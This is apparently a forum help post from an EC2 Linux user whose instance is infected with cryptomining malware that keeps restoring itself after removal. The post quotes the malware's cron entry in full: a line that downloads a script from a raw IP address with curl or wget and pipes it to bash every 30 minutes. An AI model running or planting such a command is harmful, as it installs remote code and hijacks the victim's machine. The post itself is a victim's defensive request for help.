From last few days, I have noticed that applications running on my EC2 Linux instance are very slow. Running top command showed me that there is a process /var/tmp/sustse using most of the CPU.
I killed that process. However, after rebooting the instance, it again started running and utilizing most of the CPU. It is also making cron entries for following script:
*/30 * * * * (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh
I googled and found that this is a crypto mining malware. I have removed its traces from /var/tmp/ and removed the entries in Crontab. however, these entries in Crontab seems to be coming back from somewhere and I couldn't trace the exact location of the script that's making these entries.
I have also cleaned up /var/spool/cron* entries.
I did not find any much information online to fix this issue. Any help here would be much appreciated.
Thanks in advance!!
